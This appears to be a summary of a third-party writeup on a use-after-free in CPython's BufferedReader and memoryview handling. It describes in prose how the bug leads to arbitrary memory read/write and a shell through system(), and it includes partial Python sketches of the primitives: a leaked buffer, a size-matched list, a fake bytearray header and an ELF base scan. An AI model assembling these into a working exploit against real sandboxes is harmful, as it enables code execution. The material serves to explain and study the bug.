Use-After-Free in Python 2.7+
A use-after-free caused by taking an unexpected reference to a memoryview object, which is left dangling when the parent of that object is destroyed. This is a rather low-impact bug because it requires control over the code being executed, at which point one could just write an os.system(...) call or something similar. The post is a great writeup on the process of exploiting a use-after-free, and it has some notes about exploit stability, as the author aimed to have their exploit run across all versions of Python 3.
By providing a custom File class that extends io.RawIOBase, a user can supply a malicious implementation of the readinto method. This is the method that a BufferedReader calls to actually read the underlying resource. It passes in a memoryview, which is the buffer into which the contents should be read. If the readinto method keeps a reference to this buffer, for example by placing it in a global variable, then after the BufferedReader is destroyed any use of that global variable is a use-after-free. The root issue seems to be improper reference counting: the reference held through the memoryview does not keep the underlying buffer alive. However, this bug is not slated to be fixed soon. It requires someone who can already inject arbitrary Python, so in most cases they could simply use os.system(...) to gain code execution.
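To make the pattern concrete, here is a minimal sketch of a readinto that keeps the buffer it is handed. The names File, captured and got_view are illustrative assumptions, not taken from the original exploit, and the sketch deliberately stops before the dangling reference is ever used.

```python
import io

captured = []  # hypothetical global that outlives the reader


class File(io.RawIOBase):
    """Hypothetical raw stream whose readinto leaks its buffer argument."""

    def readable(self):
        return True

    def readinto(self, buf):
        # buf is the memoryview that BufferedReader passes in.
        captured.append(buf)  # keep a reference past the end of the call
        return 0              # report end of stream


reader = io.BufferedReader(File())
reader.read(1)  # forces a call to File.readinto
got_view = isinstance(captured[0], memoryview)

# Deliberately stop here: reading or writing captured[0] after `reader`
# has been destroyed is the use-after-free on affected interpreters.
```

Nothing here touches freed memory. It only shows that the reference escapes the call, which is the precondition for the bug.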
Exploitation - Primitives
The first step of the exploitation was to reclaim the recently freed memory with a controlled object type. They did this by allocating a List of the same size as the buffer, which consistently reclaimed the improperly freed memory behind the memoryview. With this they have two ways of accessing the same memory: through the originally grabbed reference to the memoryview, which gives read/write access to all the bytes, and through the List, where Python thinks the memory is an array of PyObject pointers.
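The size matching can be sketched as follows. It assumes a CPython build and assumes the reader uses io.DEFAULT_BUFFER_SIZE; the buffer size the author actually targeted is not stated here, and the variable names are illustrative.

```python
import ctypes
import io
import sys

POINTER_SIZE = ctypes.sizeof(ctypes.c_void_p)

# Assumption: the BufferedReader was created with the default buffer size.
buffer_size = io.DEFAULT_BUFFER_SIZE

# One list slot is one object pointer, so this many slots gives an item
# array with the same byte size as the freed buffer.
slots = buffer_size // POINTER_SIZE
spray = [None] * slots

# sys.getsizeof includes the item array, so subtracting the size of an
# empty list leaves only the bytes used by the slots.
item_array_bytes = sys.getsizeof(spray) - sys.getsizeof([])
```

Matching the allocation size is what makes it likely, though not guaranteed, that the allocator hands the freed block back for the item array of the List.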
This List is what is used to craft the arbitrary read/write primitive.
First, to know where any Python object is in memory, the id() function returns its address (in CPython), so ASLR for those objects is a non-issue. Then, to get content they control directly into memory, they used a bytes object (like a b"string"). The payload of the string sits 32 bytes past the address of the object itself.
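The address arithmetic can be checked with a short sketch. It assumes CPython, where id() is the object's address, and it derives the header size from bytes.__basicsize__ instead of hard-coding it (the value is 32 on typical 64-bit builds). The variable names are illustrative.

```python
import ctypes

payload = b"AAAABBBBCCCCDDDD"

# __basicsize__ counts the fixed header plus one byte of the inline data
# array, so subtracting 1 gives the offset of the first payload byte.
header_size = bytes.__basicsize__ - 1

# CPython-specific assumption: id() returns the object's memory address.
payload_address = id(payload) + header_size

# Read the raw memory back to confirm it really is the payload.
readback = ctypes.string_at(payload_address, len(payload))
```

ctypes is used here only to confirm the offset. The exploit described in the post had no need for it, since id() alone already gives the address.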
Using this they could craft any fake Python object, place the pointer to the bytes payload into the memoryview, and then access the object through the List object that reclaimed the memoryview’s memory. Accessing it through the List makes Python treat the crafted bytes payload as a real object. The bytes payload for the arbitrary memory read/write primitive was a fake bytearray object. This object contains a pointer to a backing buffer, which can be accessed like any other array. So by crafting a fake bytearray pointing at the desired memory location, one can read and write any memory.
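As a rough illustration of what such a payload looks like, the sketch below packs bytes in the shape of a bytearray header. The field order is an assumption based on the 64-bit CPython PyByteArrayObject struct and can differ between versions and builds; the function name and the example address are hypothetical.

```python
import struct


def fake_bytearray_header(target_address, length):
    """Pack bytes shaped like a 64-bit CPython bytearray header (assumed layout)."""
    return struct.pack(
        "<7Q",
        2,               # ob_refcnt: a non-zero reference count
        id(bytearray),   # ob_type: address of the real bytearray type object
        length,          # ob_size: number of bytes visible through the object
        length,          # ob_alloc: size of the allocation
        target_address,  # ob_bytes: start of the backing buffer
        target_address,  # ob_start: logical start of the data
        0,               # ob_exports: no outstanding buffer exports
    )


# Hypothetical target address, used purely as example input.
header = fake_bytearray_header(0x7FFF00000000, 0x1000)
fields = struct.unpack("<7Q", header)
```

This only builds the bytes. Nothing in the sketch places them where the interpreter would treat them as an object.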
Exploitation - Chain
With the arbitrary read/write in hand the rest was fairly straightforward, but they did take some extra steps for stability. To start, they walked memory looking for the ELF header to calculate the CPython base address, then parsed the headers to find the PLT entries and resolve the address of system from libc. Finally, they faked a PyObject with a fake type object, which gives them control over various object method/function pointers, replaced one of those pointers with the address of system, and called it for a shell.
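The base-address search can be sketched against a simulated memory image. The read callback stands in for the arbitrary read primitive, and the page size, the function name and the fake image are all assumptions made for illustration.

```python
ELF_MAGIC = b"\x7fELF"
PAGE_SIZE = 0x1000  # assumed page size


def find_elf_base(read, address):
    """Scan downward one page at a time until the ELF magic is found."""
    page = address & ~(PAGE_SIZE - 1)  # round down to a page boundary
    while page >= 0:
        if read(page, 4) == ELF_MAGIC:
            return page
        page -= PAGE_SIZE
    return None


# Simulated memory: four pages, with an ELF header at the second page.
image = bytearray(PAGE_SIZE * 4)
image[PAGE_SIZE:PAGE_SIZE + 4] = ELF_MAGIC


def read(address, size):
    # Stand-in for the arbitrary read primitive.
    return bytes(image[address:address + size])


base = find_elf_base(read, PAGE_SIZE * 3 + 0x123)
missing = find_elf_base(read, 0x10)
```

Starting from any address known to be inside the mapped binary and stepping down by whole pages works because the ELF header sits at the start of the image's first page.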
Great writeup; even if the impact isn’t huge, it was a good read.